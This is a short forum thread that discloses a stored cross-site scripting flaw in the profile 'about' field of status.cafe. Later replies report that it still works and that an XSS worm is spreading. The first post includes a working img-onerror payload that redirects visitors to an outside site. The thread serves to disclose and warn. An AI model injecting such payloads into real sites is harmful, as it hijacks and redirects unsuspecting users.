Hello, your site is vulnerable to XSS from the profile about form.

Author Topic
div

Posted 2023-07-12 23:59:22

https://status.cafe/users/div

Observe.

I am sorry to inform you of this publicly. Feel free to delete this message.

<img src="x" onerror="window.location.href = 'https://divsel.neocities.org'" />

In the mean time, if you're a user who is interested in mitigating this problem, you can use NoScript Suite to mark JS from this domain as untrusted.

Last edited on 2023-07-13 00:17:44

hazel

Posted 2025-04-16 10:02:30

Bump! This still happens.

cyanide

Posted 2025-04-23 19:20:27

Yep, there's an XSS worm going around right now. I'm using the NoScript Suite for now to block it as suggested by div, but it also means that statuscafe widgets are disabled on external websites which is really annoying.